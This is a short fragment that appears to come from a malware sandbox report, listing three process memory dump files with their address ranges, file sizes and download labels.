memory/5004-174-0x00000000056B0000-0x0000000005716000-memory.dmp

Filesize
408KB

Download
memory/5004-173-0x0000000004ED0000-0x0000000004EF2000-memory.dmp

Filesize
136KB

Download
memory/5004-171-0x0000000002460000-0x0000000002496000-memory.dmp

Filesize
216KB

Download